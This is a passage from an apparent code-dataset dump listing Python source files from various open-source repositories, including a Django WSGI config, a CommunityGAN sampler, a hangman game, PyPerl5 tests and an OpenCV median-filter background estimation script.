self.__conn.execute(query, values)\n for r in c:\n yield r\n c.close()\n\n def table(self, name):\n return self.__tables[name]\n"},"size":{"kind":"number","value":4232,"string":"4,232"}}},{"rowIdx":843,"cells":{"max_stars_repo_path":{"kind":"string","value":"Dator/dator/wsgi.py"},"max_stars_repo_name":{"kind":"string","value":"treyfortmuller/barc"},"max_stars_count":{"kind":"number","value":191,"string":"191"},"id":{"kind":"string","value":"2024451"},"content":{"kind":"string","value":"\"\"\"\nWSGI config for ruenoor project.\n\nIt exposes the WSGI callable as a module-level variable named ``application``.\n\nFor more information on this file, see\nhttps://docs.djangoproject.com/en/1.8/howto/deployment/wsgi/\n\"\"\"\n\nimport os\nimport sys\nfrom django.core.wsgi import get_wsgi_application\n\nos.environ.setdefault(\"DJANGO_SETTINGS_MODULE\", \"dator.settings\")\npath = '/home/ubuntu/dator'\nif path not in sys.path:\n sys.path.append(path)\nsys.path.append('/home/ubuntu/dator/dator')\n\nsys.path.append('/home/ubuntu/dist/lib/python2.7/site-packages')\n\napplication = get_wsgi_application()\n"},"size":{"kind":"number","value":588,"string":"588"}}},{"rowIdx":844,"cells":{"max_stars_repo_path":{"kind":"string","value":"plot/plot_spiralwidth.py"},"max_stars_repo_name":{"kind":"string","value":"dh4gan/tache"},"max_stars_count":{"kind":"number","value":5,"string":"5"},"id":{"kind":"string","value":"2024080"},"content":{"kind":"string","value":"# Written 15/1/18 by dh4gan\n# Script reads spiralmembers.dat file from spiralfind\n# Also reads best fit parameters for each arm\n# Then computes distance of particle from arm as a function of radius\n\nimport filefinder as ff\nimport io_tache\nimport io_spiral\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom matplotlib.colors import LogNorm\n\nnpoints = 5000\n\nprint 'Select membership file to analyse:'\n\nmemberfile = ff.find_local_input_files('*_spiralmembers.dat')\nispiral = input(\"Which spiral to plot? \")\n\n# Determine eigenvalue file name from memberfile name\neigenfile = memberfile[:-18]\n\n# Read spiralmembers file\nprint 'Reading spiral membership in file',memberfile\n\nx,y,z,spiralmember = io_spiral.read_spiralmembership(memberfile)\nprint 'Read ', len(spiralmember), ' elements'\n#print spiralmember\n\n# Read best fits (either .chimin or .fitparams)\nfitparamfile = eigenfile+'_spirals.chimin'\n\nfitdata = np.genfromtxt(fitparamfile,skiprows=2)\n\n# Find fit parameters for selected arm\n\na = fitdata[ispiral-1,2]\nb = fitdata[ispiral-1,3]\nx0 = fitdata[ispiral-1,4]\ny0 = fitdata[ispiral-1,5]\nxsign = fitdata[ispiral-1,7]\nysign = fitdata[ispiral-1,8]\n\n# Find all elements belonging to that arm\n\nimember = spiralmember[:]==ispiral\n\nx = x[imember]\ny = y[imember]\nz = z[imember]\n\nxorigin = 0.0\nyorigin = 0.0\n\nnmember = len(x)\n\nprint 'Found ', nmember, ' members of spiral ', ispiral\n\n# For each element:\n# compute r, sepmin (minimum distance from spiral)\n# save to arrays\n\n#nmember = 1000\nr = np.zeros(nmember)\nt = np.zeros(nmember)\nsepmin = np.zeros(nmember)\nweight = np.zeros(nmember)\n\nfor i in range(nmember):\n\n r[i] = io_spiral.separation(xorigin,yorigin,x[i],y[i])\n t[i], sepmin[i] = io_spiral.find_minimum_t_logspiral(x[i],y[i],a,b,x0,y0,npoints,xsign=xsign,ysign=ysign)\n\n print i,r[i],t[i], sepmin[i]\n\ntmin = np.amin(t)\ntmax = np.amax(t)\n\nweight[:] = 1.0/float(nmember)\n\nprint 'Minimum, maximum r: ', np.amin(r), np.amax(r)\nprint 'Minimum, maximum t: ', tmin, tmax\nprint 'Generating curve: '\nprint a,b,x0,y0,xsign,ysign\n\n\nxspiral, yspiral = io_spiral.generate_logspiral_curve(tmin,tmax,a,b,x0,y0,xsign=xsign,ysign=ysign,npoints=npoints)\n\n\nfig1 = plt.figure()\nax1 = fig1.add_subplot(111)\n#ax2 = fig1.add_subplot(212)\nax1.set_xlabel('R (kpc)',fontsize=22)\nax1.set_ylabel('Spine Distance (kpc)',fontsize=22)\ncounts, xbins,ybins, image = ax1.hist2d(r/10.0,sepmin/10.0,bins=20, range=[[1.0,4.0],[0.0,0.1]],normed=False,cmap='rainbow')\n#plt.colorbar(image,ax=ax1)\n\nmaxcount = counts.max()\n\nprint maxcount, np.median(counts)\n\nclevels = [50,70,90,95]\nclabels = [str(i)+'%' for i in clevels]\nclevels = [np.percentile(counts[np.nonzero(counts)],i) for i in clevels]\n\n\nprint clevels\nprint clabels\n\nCS= ax1.contour(counts.transpose(),extent=[xbins.min(),xbins.max(),ybins.min(),ybins.max()],colors='white',levels=clevels)\n\nfmt={}\nfor l,s in zip(CS.levels,clabels):\n fmt[l]=s\n\nplt.clabel(CS,fontsize=16,fmt=fmt)\n\n#ax1.hist(sepmin[:100])\n#ax2.scatter(x[:100],y[:100])\n#ax2.plot(xspiral,yspiral,color='red')\n\n\nfig2 = plt.figure()\nax2 = fig2.add_subplot(111)\nax2.set_ylabel('Relative Frequency',fontsize=22)\nax2.set_xlabel('Spine Distance (kpc)',fontsize=22)\nax2.hist(sepmin/10.0,bins=50, histtype='step', label='all radii', linewidth=2,normed=True)\n\nsepclose = sepmin[np.logical_and(r[:]>=10.0,r[:]<20.0)]\nsepfar = sepmin[np.logical_and(r[:]>=20.0,r[:]<30.0)]\nax2.hist(sepclose/10.0, histtype = 'step',label = '$1.0 < r < 2.0 $ kpc',linewidth=2,normed=True)\nax2.hist(sepfar/10.0,histtype = 'step',label = '$2.0 < r < 3.0 $ kpc',linewidth=2,normed=True)\n\nax2.legend(loc='upper right')\nplt.show()\nfig1.savefig(eigenfile+'spiral_'+str(ispiral)+'width_vs_r.png')\nfig2.savefig(eigenfile+'spiral_'+str(ispiral)+'width1D.png')\n\n"},"size":{"kind":"number","value":3721,"string":"3,721"}}},{"rowIdx":845,"cells":{"max_stars_repo_path":{"kind":"string","value":"src/exceptionite/tabs/RecommendationsTab.py"},"max_stars_repo_name":{"kind":"string","value":"girardinsamuel/exceptionite"},"max_stars_count":{"kind":"number","value":6,"string":"6"},"id":{"kind":"string","value":"2024367"},"content":{"kind":"string","value":"from ..Tab import Tab\nfrom ..blocks.PackagesUpdates import PackagesUpdates\n\n\nclass RecommendationsTab(Tab):\n\n name = \"Recommendations\"\n id = \"recommendations\"\n icon = \"CheckCircleIcon\"\n advertise_content = True\n\n def __init__(self, handler):\n super().__init__(handler)\n self.add_blocks(PackagesUpdates)\n"},"size":{"kind":"number","value":332,"string":"332"}}},{"rowIdx":846,"cells":{"max_stars_repo_path":{"kind":"string","value":"main.py"},"max_stars_repo_name":{"kind":"string","value":"prehensile/knobtwiddler"},"max_stars_count":{"kind":"number","value":0,"string":"0"},"id":{"kind":"string","value":"2022831"},"content":{"kind":"string","value":"import sys, os\nimport tuning\nimport rtlfm\n\n# main runloop\nrtl = rtlfm.RTLFM()\n#while True:\nfor i in range( 10 ):\n\n # get a tuning\n t = tuning.get_next_tuning()\n\n # sample a bit\n rtl.sample_frequency(\n frequency = t.frequency, \n modulation = t.modulation,\n duration = 5 * 1000\n )\n \n # TODO: detect non-silence\n\n # if not silence\n # TODO: sample more\n # TODO: detect voice\n"},"size":{"kind":"number","value":426,"string":"426"}}},{"rowIdx":847,"cells":{"max_stars_repo_path":{"kind":"string","value":"kino/management/__init__.py"},"max_stars_repo_name":{"kind":"string","value":"DongjunLee/kino-bot"},"max_stars_count":{"kind":"number","value":109,"string":"109"},"id":{"kind":"string","value":"2023160"},"content":{"kind":"string","value":"import inspect\nimport json\n\nfrom ..functions import Functions\nfrom ..utils.data_handler import DataHandler\nfrom ..utils.data_loader import SkillData\nfrom ..utils.data_loader import FeedData\n\n\ndef register_skills():\n skills = inspect.getmembers(Functions, predicate=inspect.isfunction)\n del skills[0] # del __init__\n\n print(\"start register skills\")\n\n skill_dict = {}\n try:\n for k, v in skills:\n parsed_doc = parse_doc(v.__doc__)\n if parsed_doc is None:\n print(f\"{k} skill do not have doc. skip thie skill.\")\n continue\n\n parsed_doc[\"params\"] = list(v.__annotations__.keys())\n skill_dict[k] = parsed_doc\n except BaseException as e:\n print(v.__doc__)\n\n data_handler = DataHandler()\n data_handler.write_file(\"skills.json\", skill_dict)\n\n print(f\"kino-bot has **{len(skill_dict)}** skills.\")\n for k, v in skill_dict.items():\n print(\n f\" - {v.get('icon', ':white_small_square: ')}**{k}** : {v.get('description', '')}\"\n )\n\n\ndef parse_doc(doc_string):\n if doc_string is None:\n return None\n\n parsed_doc = {}\n for line in doc_string.splitlines():\n if \":\" in line:\n line = line.strip()\n delimeter_index = line.index(\":\")\n\n key = line[:delimeter_index]\n value = json.loads(line[delimeter_index + 1 :])\n\n parsed_doc[key] = value\n return parsed_doc\n\n\ndef prepare_skill_data():\n print(\"setting skill logs for Skill Predictor ...\")\n SkillData()\n\n\ndef prepare_feed_data():\n print(\"setting feed and pocket logs for Feed Classifier ...\")\n FeedData()\n"},"size":{"kind":"number","value":1666,"string":"1,666"}}},{"rowIdx":848,"cells":{"max_stars_repo_path":{"kind":"string","value":"src/CommunityGAN/sampling.py"},"max_stars_repo_name":{"kind":"string","value":"Bipasha-banerjee/newCGAN"},"max_stars_count":{"kind":"number","value":69,"string":"69"},"id":{"kind":"string","value":"2024094"},"content":{"kind":"string","value":"import numpy as np\nimport multiprocessing\nimport sys\nimport pickle\nimport utils\nimport random\n\n\ndef choice(samples, weight):\n s = np.sum(weight)\n target = random.random() * s\n for si, wi in zip(samples, weight):\n if target < wi:\n return si\n target -= wi\n return si\n\n\nclass Sampling(object):\n def __init__(self):\n super(Sampling, self).__init__()\n self.config = pickle.load(open(sys.argv[1], 'rb'))\n self.id2nid = pickle.load(open(self.config.cache_filename_prefix + '.neighbor.pkl', 'rb'))\n self.total_motifs = pickle.load(open(self.config.cache_filename_prefix + '.motifs.pkl', 'rb'))\n self.theta_g = pickle.load(open(self.config.cache_filename_prefix + '.theta.pkl', 'rb'))\n self.args = pickle.load(open(self.config.cache_filename_prefix + '.args.pkl', 'rb'))\n # print('load data done', datetime.datetime.now())\n\n def run(self):\n cores = self.config.num_threads\n motifs, paths = zip(*multiprocessing.Pool(cores).map(self.g_s, self.args))\n pickle.dump(motifs, open(self.config.cache_filename_prefix + '.motifs_sampled.pkl', 'wb'))\n pickle.dump(paths, open(self.config.cache_filename_prefix + '.paths.pkl', 'wb'))\n\n def g_s(self, args): # for multiprocessing, pass multiple args in one tuple\n root, n_sample, only_neg = args\n motifs = []\n paths = []\n for i in range(2 * n_sample):\n if len(motifs) >= n_sample:\n break\n motif = [root]\n path = [root]\n for j in range(1, self.config.motif_size):\n v, p = self.g_v(motif)\n if v is None:\n break\n motif.append(v)\n path.extend(p)\n if len(set(motif)) < self.config.motif_size:\n continue\n motif = tuple(sorted(motif))\n if only_neg and motif in self.total_motifs:\n continue\n motifs.append(motif)\n paths.append(path)\n return motifs, paths\n\n def g_v(self, roots):\n g_v_v = self.theta_g[roots[0]].copy()\n for nid in roots[1:]:\n g_v_v *= self.theta_g[nid]\n current_node = roots[-1]\n previous_nodes = set()\n path = []\n is_root = True\n while True:\n if is_root:\n node_neighbor = list({neighbor for root in roots for neighbor in self.id2nid[root]})\n else:\n node_neighbor = self.id2nid[current_node]\n if len(node_neighbor) == 0: # the root node has no neighbor\n return None, None\n if is_root:\n tmp_g = g_v_v\n else:\n tmp_g = g_v_v * self.theta_g[current_node]\n relevance_probability = np.sum(self.theta_g[node_neighbor] * tmp_g, axis=1)\n relevance_probability = utils.agm(relevance_probability)\n next_node = choice(node_neighbor, relevance_probability) # select next node\n if next_node in previous_nodes: # terminating condition\n break\n previous_nodes.add(current_node)\n current_node = next_node\n path.append(current_node)\n is_root = False\n return current_node, path\n\n\nif __name__ == '__main__':\n if len(sys.argv) != 2:\n print('Usage: python sampling.py config.pkl')\n s = Sampling()\n s.run()\n"},"size":{"kind":"number","value":3424,"string":"3,424"}}},{"rowIdx":849,"cells":{"max_stars_repo_path":{"kind":"string","value":"tadataka/dataset/__init__.py"},"max_stars_repo_name":{"kind":"string","value":"IshitaTakeshi/Tadataka"},"max_stars_count":{"kind":"number","value":54,"string":"54"},"id":{"kind":"string","value":"2024311"},"content":{"kind":"string","value":"from tadataka.dataset.tum_rgbd import TumRgbdDataset\nfrom tadataka.dataset.new_tsukuba import NewTsukubaDataset\nfrom tadataka.dataset.euroc import EurocDataset\n"},"size":{"kind":"number","value":160,"string":"160"}}},{"rowIdx":850,"cells":{"max_stars_repo_path":{"kind":"string","value":"GRE Hangman/gameplay.py"},"max_stars_repo_name":{"kind":"string","value":"ntdai95/Personal-Projects"},"max_stars_count":{"kind":"number","value":3,"string":"3"},"id":{"kind":"string","value":"2024111"},"content":{"kind":"string","value":"# Importing the colored function for user-friendly display\nfrom termcolor import colored\n\nclass LetterPlacer:\n def placing_letter_in_word(self, chosen_letter, list_secret_word, list_current_position):\n \"\"\"Placing the user's guessed letter into the corresponding position among the list of list_current_position and then convert\n it to a string to print out to the user the location of his/her choice of guessed letters\"\"\"\n # Creating an empty list for the indexes where the user's guessed letter is located\n indexes = []\n # Adding the indexes to the list of indexes where the user's guessed letter is located\n for index, letter in enumerate(list_secret_word):\n if letter == chosen_letter:\n indexes.append(index)\n # Change the \"_\" characters with the user's guessed letter based on its location in the secret word\n for index in indexes:\n list_current_position[index] = chosen_letter\n # Creating an empty string to display the location of the guessed letter for the user\n string_current_position = \"\"\n # Adding up the \"_\" characters with the correctly guessed letters as a string to display to the user\n for index in list_current_position:\n string_current_position = string_current_position + \" \" + index\n # Print out the location of the guessed letter to the user\n print(f\"{chosen_letter} is in the word{string_current_position}.\")\n # Return the updated list of list_current_position with the added guessed letter\n return list_current_position\n\nclass GuessedWordChecker:\n def guess_word_input_validator(self):\n \"\"\"Asking and checking the user's guessed word\"\"\"\n # Create a while loop to keep asking for a valid guessed word from the user\n while True:\n # Asking the user for the guessed word, allowing the mix of uppercased and lowercased letters. Need to be upeercased the \n # user input, so that it can match with the uppercased secret word.\n guessed_word = input(\"\\nTry and guess the word? \").upper()\n # If the user's guessed word is valid, then return it.\n if guessed_word.isalpha() == True:\n return guessed_word\n # If the user's guessed word is not valid (the guessed word contains non-alphabetical characters such as numbers of symbols,\n # @, !, etc.), then display the warning message and go back and ask the new guessed word again.\n else:\n print(\"Please, guess a real word with alphabetical letters only.\")\n\n def guessed_word_is_secret_word(self, guessed_word, secret_word, wrong_guess):\n \"\"\"Decides if the user's guessed word is the same as the secret word\"\"\"\n # If the user's guessed word is the same as the secret word, then return the user's guessed word, which will be the same as the \n # secret word\n if guessed_word == secret_word:\n return guessed_word\n # If the user's guessed word is not the same as the secret word, then print out the warning message and return the guessed word\n # as an empty string\n else:\n guessed_word = \"\"\n print(f\"That is not the word.\\nYou still have {wrong_guess} guesses remaining.\")\n return guessed_word\n\nclass LetterChecker:\n def letter_validator(self, chosen_letter, guessed_letters):\n \"\"\"Checking if the user's entered letter is valid or not\"\"\"\n # Check if the user enters an alphabetical letter or not\n if chosen_letter.isalpha() == False:\n print(\"Please, enter an alphabetical letter only!\")\n # Check if the user enters only 1 letter or not\n elif len(list(chosen_letter)) != 1:\n print(\"Please, enter one letter only!\")\n # Check if the guessed letter has already been guessed before\n elif chosen_letter in guessed_letters:\n print(\"You already guessed this letter. Please, choose another letter.\")\n # If there is no issue with the guessed letter, then return the following message\n else:\n return \"Good letter\"\n\n def chosen_letter_in_list_secret_word(self, chosen_letter, wrong_guess, list_secret_word, list_current_position, secret_word, guessed_word):\n \"\"\"Checking if the user's chosen letter is among the list of letters of the secret word\"\"\"\n # Checking if user input of letter is in the secret word\n if chosen_letter in list_secret_word:\n # If the chosen letter is in the list of letters of secret word, then place that guessed letter in to its appropriate\n # position(s) in the list of letters of secret word with the function of\n # placing_letter_in_word()\n instance_of_LetterPlacer = LetterPlacer()\n list_current_position = instance_of_LetterPlacer.placing_letter_in_word(chosen_letter, list_secret_word, list_current_position)\n # If the user find out all of the letters in the secret word, then there is no point to keep asking him again to guess the \n # secret word\n if \"_\" not in list_current_position:\n return wrong_guess, list_current_position, secret_word\n else:\n instance_of_GuessedWordChecker = GuessedWordChecker()\n # Ask the user to enter his/her's guess for the secret word and check if it is valid\n guessed_word = instance_of_GuessedWordChecker.guess_word_input_validator()\n # Replacing the guessed word with the secret word if the user correctly guessed the word with the function of\n # guessed_word_is_secret_word()\n guessed_word = instance_of_GuessedWordChecker.guessed_word_is_secret_word(guessed_word, secret_word, wrong_guess)\n # If the word is not in the secret word, then decrease the number of guesses remaining by 1 and print out how many guess remains\n # for the user\n else:\n wrong_guess -=1\n print(f\"{chosen_letter} is not in the word.\\nYou have {wrong_guess} guesses remaining.\")\n # Return the updated wrong_guess, list_current_position, guessed_word variables\n return wrong_guess, list_current_position, guessed_word\n\nclass Gameplay:\n def gameplay(self, secret_word, definition_secret_word, list_current_position, list_secret_word, wrong_guess, guessed_letters):\n \"\"\"Deciding if the user correctly guessed the word or not\"\"\"\n # Creating a while loop to let the user guessed the letters until he/she runs out of guesses remainng\n while wrong_guess != 0:\n # Displaying the definition and the current position of guessed letters in the secret word\n print(colored(f\"\\nDefinition: {definition_secret_word}\", \"cyan\"))\n string_current_position = \"\"\n for character in list_current_position:\n string_current_position += character + \" \"\n print(colored(f\"Word: {string_current_position[:-1]}\\n\", \"cyan\"))\n # Asking the user for a letter, allowing either an uppercased or lowercased letter. Need to be uppercased the user input so \n # that it can match the list of uppercased letters from the list of list_secret_word\n chosen_letter = input(\"Guess a letter? \").upper()\n # Checking, if the letter is valid with the letter_validator() function\n instance_of_LetterChecker = LetterChecker()\n letter_validity = instance_of_LetterChecker.letter_validator(chosen_letter, guessed_letters)\n # Creating an empty string of guessed word, which will be the secret word if the user guesses it correctly and empty string\n # otherwise\n guessed_word = \"\"\n # If the user input letter is valid, then move on, otherwise go back and ask a new letter again\n if letter_validity == \"Good letter\":\n # Adding the user entered valid letter to the lsit of guessed_letters to later check if the user is guessing the same \n # letter again\n guessed_letters.append(chosen_letter)\n # Checking if the user's guessed letter is among the list of letters of the secret word with the function of\n # chosen_letter_in_list_secret_word(). Then, return the number of wrong guesses remaining, the\n # list of list_current_position (to display the current standing to the user), and the guessed_word as a secret word if \n # the user guesses the word correctly after the guessing correctly the letter is among the letters of the secret word\n wrong_guess, list_current_position, guessed_word = instance_of_LetterChecker.chosen_letter_in_list_secret_word(chosen_letter, wrong_guess, list_secret_word, list_current_position, secret_word, guessed_word)\n # If the user guessed the secret word correctly, then return the guessed word as a secret word\n if guessed_word == secret_word:\n return guessed_word\n # If the user did not guessed the secret word correctly and runs out of guesses, then return the guessed word as an empty string\n else:\n return guessed_word"},"size":{"kind":"number","value":9282,"string":"9,282"}}},{"rowIdx":851,"cells":{"max_stars_repo_path":{"kind":"string","value":"tests/test_perl_side_proxy.py"},"max_stars_repo_name":{"kind":"string","value":"yacchi21/PyPerl5"},"max_stars_count":{"kind":"number","value":0,"string":"0"},"id":{"kind":"string","value":"2024379"},"content":{"kind":"string","value":"# -*- coding:utf8 -*-\nfrom __future__ import division, print_function, unicode_literals\n\nimport unittest\n\nimport perl5\n\n\nclass ProxyTestObject(object):\n def __init__(self, attr1):\n self._attr1 = attr1\n\n def attr1(self, data=None):\n if data is None:\n return self._attr1\n self._attr1 = data\n\n\ndef proxy_test_func(arg):\n return arg\n\n\nSCRIPT = r\"\"\"\nuse PyPerl5::Proxy qw/ py_get_object /;\nuse PyPerl5::Boolean qw/ true false /;\nsub unit_test {\n my $ut = shift;\n \n $ut->assertTrue(1);\n $ut->assertFalse(0);\n \n $ut->assertTrue(true);\n $ut->assertFalse(false);\n \n $ut->assertEqual([1, true], [1, true]);\n}\n\nsub unit_test2 {\n my $ut = shift;\n my $class = py_get_object(\"tests.test_perl_side_proxy.ProxyTestObject\");\n $ut->assertTrue($class->isa(\"PyPerl5::Proxy\"));\n \n my $o = $class->new(\"TEST\");\n $ut->assertEqual(\"TEST\", $o->attr1);\n $o->attr1(\"TEST2\");\n $ut->assertEqual(\"TEST2\", $o->attr1);\n}\n\nsub unit_test3 {\n my $ut = shift;\n my $f = py_get_object(\"tests.test_perl_side_proxy.proxy_test_func\");\n my $ret = $f->(\"call\");\n $ut->assertEqual(\"call\", $ret); \n}\n\"\"\"\n\n\nclass TestCase(unittest.TestCase):\n vm = None\n\n def setUp(self):\n self.vm = vm = perl5.VM()\n vm.eval(SCRIPT)\n\n def tearDown(self):\n self.vm.close()\n\n def test_object_proxy(self):\n self.vm.call(\"unit_test\", self)\n\n def test_py_get_object(self):\n self.vm.call(\"unit_test2\", self)\n\n def test_function_exec(self):\n self.vm.call(\"unit_test3\", self)\n\n\nif __name__ == '__main__':\n unittest.main()\n"},"size":{"kind":"number","value":1618,"string":"1,618"}}},{"rowIdx":852,"cells":{"max_stars_repo_path":{"kind":"string","value":"src/utils/__init__.py"},"max_stars_repo_name":{"kind":"string","value":"amiiiirrrr/TensorRT_keras_model"},"max_stars_count":{"kind":"number","value":1,"string":"1"},"id":{"kind":"string","value":"2024204"},"content":{"kind":"string","value":"#coding: utf-8\nfrom utils.callbacks import CallbackForSegmentation\nfrom utils.imagegen import CroppedImageDataGenerator, get_datagen\nfrom utils.misc import *"},"size":{"kind":"number","value":157,"string":"157"}}},{"rowIdx":853,"cells":{"max_stars_repo_path":{"kind":"string","value":"src/icp/apps/beekeepers/migrations/0005_aprilsurvey.py"},"max_stars_repo_name":{"kind":"string","value":"project-icp/bee-pollinator-app"},"max_stars_count":{"kind":"number","value":6,"string":"6"},"id":{"kind":"string","value":"2023180"},"content":{"kind":"string","value":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('beekeepers', '0004_survey_unique_together'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='AprilSurvey',\n fields=[\n ('survey', models.OneToOneField(related_name='april', primary_key=True, serialize=False, to='beekeepers.Survey')),\n ('colony_loss_reason', models.TextField(help_text='The most likely causes for colony loss')),\n ],\n ),\n ]\n"},"size":{"kind":"number","value":608,"string":"608"}}},{"rowIdx":854,"cells":{"max_stars_repo_path":{"kind":"string","value":"dash_berkay/urls.py"},"max_stars_repo_name":{"kind":"string","value":"efebuyuk/jd_intern_project"},"max_stars_count":{"kind":"number","value":1,"string":"1"},"id":{"kind":"string","value":"2024588"},"content":{"kind":"string","value":"from django.urls import path\nfrom . import views\nfrom django.conf.urls import url\n\n\nurlpatterns = [\n path('', views.startapp),\n]"},"size":{"kind":"number","value":131,"string":"131"}}},{"rowIdx":855,"cells":{"max_stars_repo_path":{"kind":"string","value":"transaction/tests/models/test_user_tag.py"},"max_stars_repo_name":{"kind":"string","value":"Arthuchaut/sagittarius_project"},"max_stars_count":{"kind":"number","value":0,"string":"0"},"id":{"kind":"string","value":"2024067"},"content":{"kind":"string","value":"import pytest\nfrom user.models import User\nfrom transaction.models import UserTag\n\n\nclass TestUserTag:\n '''The UserTag model test class.\n '''\n\n @pytest.mark.django_db(transaction=True)\n @pytest.mark.parametrize(\n 'name, icon', [\n ('foo', None),\n ('bar', 'baz'),\n pytest.param(None, 'baz', marks=pytest.mark.xfail),\n ]\n )\n def test_create(self, lambda_user: User, name: str, icon: str) -> None:\n '''Test the user_tag creation.\n '''\n\n user_tag: UserTag = UserTag.objects.create(\n name=name, icon=icon, user=lambda_user\n )\n assert user_tag"},"size":{"kind":"number","value":647,"string":"647"}}},{"rowIdx":856,"cells":{"max_stars_repo_path":{"kind":"string","value":"niaaml/fitness/utility.py"},"max_stars_repo_name":{"kind":"string","value":"musicinmybrain/NiaAML"},"max_stars_count":{"kind":"number","value":22,"string":"22"},"id":{"kind":"string","value":"2024406"},"content":{"kind":"string","value":"from niaaml.utilities import Factory\nfrom niaaml.fitness.accuracy import Accuracy\nfrom niaaml.fitness.cohen_kappa import CohenKappa\nfrom niaaml.fitness.precision import Precision\nfrom niaaml.fitness.f1 import F1\n\n__all__ = [\"FitnessFactory\"]\n\n\nclass FitnessFactory(Factory):\n r\"\"\"Class with string mappings to fitness class.\n\n Attributes:\n _entities (Dict[str, Fitness]): Mapping from strings to fitness classes.\n\n See Also:\n * :class:`niaaml.utilities.Factory`\n \"\"\"\n\n def _set_parameters(self, **kwargs):\n r\"\"\"Set the parameters/arguments of the factory.\"\"\"\n self._entities = {\n \"Accuracy\": Accuracy,\n \"Precision\": Precision,\n \"CohenKappa\": CohenKappa,\n \"F1\": F1,\n }\n"},"size":{"kind":"number","value":762,"string":"762"}}},{"rowIdx":857,"cells":{"max_stars_repo_path":{"kind":"string","value":"backend/posts/migrations/0002_remove_post_tags.py"},"max_stars_repo_name":{"kind":"string","value":"a-samir97/medium-clone"},"max_stars_count":{"kind":"number","value":0,"string":"0"},"id":{"kind":"string","value":"2024202"},"content":{"kind":"string","value":"# Generated by Django 3.1.3 on 2020-11-21 09:49\n\nfrom django.db import migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('posts', '0001_initial'),\n ]\n\n operations = [\n migrations.RemoveField(\n model_name='post',\n name='tags',\n ),\n ]\n"},"size":{"kind":"number","value":311,"string":"311"}}},{"rowIdx":858,"cells":{"max_stars_repo_path":{"kind":"string","value":"tools/modules/TREX/core/__init__.py"},"max_stars_repo_name":{"kind":"string","value":"automenta/trex-autonomy"},"max_stars_count":{"kind":"number","value":0,"string":"0"},"id":{"kind":"string","value":"2024063"},"content":{"kind":"string","value":"\n# Import TREX analog classes\nfrom TREX.core.db_core import DbCore,Timeline\nfrom TREX.core.assembly import Assembly,Entity,Rule,Token,Slot,Variable\n\n# Import \nfrom TREX.core.token_network import TokenNetwork\nfrom TREX.core.token_network_filter import TokenNetworkFilter\n"},"size":{"kind":"number","value":270,"string":"270"}}},{"rowIdx":859,"cells":{"max_stars_repo_path":{"kind":"string","value":"tests/chainer_tests/functions_tests/pooling_tests/pooling_nd_helper.py"},"max_stars_repo_name":{"kind":"string","value":"zjzh/chainer"},"max_stars_count":{"kind":"number","value":3705,"string":"3,705"},"id":{"kind":"string","value":"2024168"},"content":{"kind":"string","value":"import itertools\n\nimport numpy\nimport six\n\nfrom chainer import testing\nimport chainer.utils\n\n\ndef pooling_patches(dims, ksize, stride, pad, cover_all):\n \"\"\"Return tuples of slices that indicate pooling patches.\"\"\"\n # Left-top indexes of each pooling patch.\n if cover_all:\n xss = itertools.product(\n *[six.moves.range(-p, d + p - k + s, s)\n for (d, k, s, p) in six.moves.zip(dims, ksize, stride, pad)])\n else:\n xss = itertools.product(\n *[six.moves.range(-p, d + p - k + 1, s)\n for (d, k, s, p) in six.moves.zip(dims, ksize, stride, pad)])\n # Tuples of slices for pooling patches.\n return [tuple(slice(max(x, 0), min(x + k, d))\n for (x, d, k) in six.moves.zip(xs, dims, ksize))\n for xs in xss]\n\n\ndef shuffled_linspace(shape, dtype):\n size = chainer.utils.size_of_shape(shape)\n x = numpy.random.permutation(size) + numpy.random.uniform(0.3, 0.7, size)\n x = (2 * x / max(1, size) - 1).astype(dtype)\n return x.reshape(shape)\n\n\ntesting.run_module(__name__, __file__)\n"},"size":{"kind":"number","value":1082,"string":"1,082"}}},{"rowIdx":860,"cells":{"max_stars_repo_path":{"kind":"string","value":"tensortools/optimize/__init__.py"},"max_stars_repo_name":{"kind":"string","value":"klmcguir/tensortools"},"max_stars_count":{"kind":"number","value":0,"string":"0"},"id":{"kind":"string","value":"2023168"},"content":{"kind":"string","value":"\"\"\"\nOptimization routines for CP decompositions\n\"\"\"\n\nfrom .optim_utils import FitResult\nfrom .cp_als import cp_als\nfrom .mcp_als import mcp_als\nfrom .ncp_hals import ncp_hals\nfrom .ncp_bcd import ncp_bcd\nfrom .mncp_hals import mncp_hals\n"},"size":{"kind":"number","value":237,"string":"237"}}},{"rowIdx":861,"cells":{"max_stars_repo_path":{"kind":"string","value":"Python/BGEstimation.py"},"max_stars_repo_name":{"kind":"string","value":"Prasheel24/background-estimation"},"max_stars_count":{"kind":"number","value":0,"string":"0"},"id":{"kind":"string","value":"2022696"},"content":{"kind":"string","value":"# -*- coding: utf-8 -*-\n\"\"\"Background Estimation with Median Filtering\"\"\"\n\n__name__ = \"BGEstimation\"\n__version__ = (1,0)\n__author__ = \" <>\"\n\n_generator_name = __name__ + \"-\" + \".\".join(map(str, __version__))\n\n\n# Import the required libraries\nimport numpy as np\nimport sys, os\ntry:\n sys.path.remove('/opt/ros/kinetic/lib/python2.7/dist-packages')\nexcept:\n pass\nimport cv2 \nfrom skimage import data, filters\n\n# Capture the Video for Background Estimation in VideoCapture object\ncaptured_video = cv2.VideoCapture('MorganBridgeFeed.mp4')\n\n# Select 25 frames from the captured_video at Random\n# CAP_PROP_FRAME_COUNT returns the frame count from the video file\n# Product with np.random.uniform with specified size gives\n# Random frames from the video of type ndarray\nframe_ids = captured_video.get(cv2.CAP_PROP_FRAME_COUNT) * np.random.uniform(size=20)\n\n# Store the frames in an empty array(list)\ntemp_frames = []\n\n# Loop through to get each frame with its corresponding id\nfor frame_id in frame_ids:\n\t# mark each frame on videocapture object\n\tcaptured_video.set(cv2.CAP_PROP_POS_FRAMES, frame_id)\n\t# get each frame\n\tret_val, individual_frame = captured_video.read()\n\t# append into temporary list\n\ttemp_frames.append(individual_frame)\n# print(ret_val)\n\n# Now we calculate the median along the time axis\nmedian_frame = np.median(temp_frames, axis=0).astype(dtype=np.uint8)\n\n# Display the median frame thus calculated\ncv2.imshow('Median Frame', median_frame)\ncv2.waitKey(0)\n# cv2.imwrite('median_frame.jpg',median_frame)\n\n\n\n# Now we create a mask for every frame\n# Reset previously set frame number to 0\ncaptured_video.set(cv2.CAP_PROP_POS_FRAMES, 0)\n\n# Now convert median frame to grayscale\ngray_median_frame = cv2.cvtColor(median_frame, 